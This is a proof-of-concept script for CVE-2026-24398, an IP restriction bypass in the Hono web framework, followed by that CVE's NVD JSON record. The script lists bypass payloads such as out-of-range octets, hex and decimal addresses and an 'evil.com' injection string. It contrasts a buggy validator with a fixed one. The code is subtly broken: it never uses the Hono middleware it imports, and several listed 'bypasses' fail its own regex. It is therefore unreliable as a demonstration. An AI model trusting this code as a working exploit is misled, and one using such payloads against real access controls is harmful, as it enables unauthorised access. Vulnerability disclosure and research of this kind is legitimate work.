CVE-2026-24398

// CVE-2026-24398 PoC - Hono IP Restriction Bypass // This PoC demonstrates bypassing IP validation using malformed IPv4 addresses const { Hono } = require('hono'); const { ipRestrict } = require('hono/ip-restriction'); // Vulnerable configuration (before fix) const app = new Hono(); // Example bypass techniques const bypassPayloads = [ '192.168.1.256', // Octet value exceeds 255 '192.168.1.999', // Multiple octets exceed valid range '192.168.1.-1', // Negative octet value '192.168.1.01', // Leading zero (ambiguous parsing) '192.168.1.1\\.evil.com', // Injection attempt '0xC0.0xA8.0x01.0x01', // Hexadecimal notation '3232235777', // Decimal notation (32-bit integer) '192.168.1.1/24', // CIDR notation ]; // Test function to demonstrate bypass async function testIPRestriction() { console.log('Testing IP Restriction Bypass for CVE-2026-24398'); console.log('==================================================\n'); for (const payload of bypassPayloads) { try { // Simulate IP validation const isValid = validateIPv4(payload); console.log(`Payload: ${payload}`); console.log(`Validation Result: ${isValid ? 'VALID (VULNERABLE)' : 'INVALID'}`); console.log('---'); } catch (error) { console.error(`Error testing ${payload}: ${error.message}`); } } } // Vulnerable validation function (simplified) function validateIPv4(ip) { // This regex doesn't properly validate octet range const IPV4_REGEX = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/; const match = ip.match(IPV4_REGEX); if (!match) return false; // BUG: Missing range check for 0-255 // Should check: octet >= 0 && octet <= 255 return true; } // Correct validation function (fixed version) function validateIPv4Fixed(ip) { const IPV4_REGEX = /^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$/; const match = ip.match(IPV4_REGEX); if (!match) return false; // Fixed: Proper range validation const octets = [match[1], match[2], match[3], match[4]].map(Number); return octets.every(octet => octet >= 0 && octet <= 255); } testIPRestriction(); /* Remediation: 1. Upgrade Hono to version 4.11.7 or later 2. Implement proper IP validation with range checks 3. Use additional authentication mechanisms beyond IP-based restrictions */

{"cve": {"id": "CVE-2026-24398", "sourceIdentifier": "[email protected]", "published": "2026-01-27T19:16:16.363", "lastModified": "2026-02-04T15:34:58.003", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Hono is a Web application framework that provides support for any JavaScript runtime. Prior to version 4.11.7, IP Restriction Middleware in Hono is vulnerable to an IP address validation bypass. The `IPV4_REGEX` pattern and `convertIPv4ToBinary` function in `src/utils/ipaddr.ts` do not properly validate that IPv4 octet values are within the valid range of 0-255, allowing attackers to craft malformed IP addresses that bypass IP-based access controls. Version 4.11.7 contains a patch for the issue."}, {"lang": "es", "value": "Hono es un framework de aplicación web que proporciona soporte para cualquier entorno de ejecución de JavaScript. Antes de la versión 4.11.7, el Middleware de Restricción de IP en Hono es vulnerable a una omisión de validación de dirección IP. El patrón 'IPV4_REGEX' y la función 'convertIPv4ToBinary' en 'src/utils/ipaddr.ts' no validan correctamente que los valores de octeto IPv4 estén dentro del rango válido de 0-255, permitiendo a los atacantes crear direcciones IP malformadas que eluden los controles de acceso basados en IP. La versión 4.11.7 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-185"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hono:hono:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "4.11.7", "matchCriteriaId": "D0406A9F-E15B-452E-940A-ABF25EEAA871"}]}]}], "references": [{"url": "https://github.com/honojs/hono/commit/edbf6eea8e6c26a3937518d4ed91d8666edeec37", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/honojs/hono/releases/tag/v4.11.7", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/honojs/hono/security/advisories/GHSA-r354-f388-2fhh", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}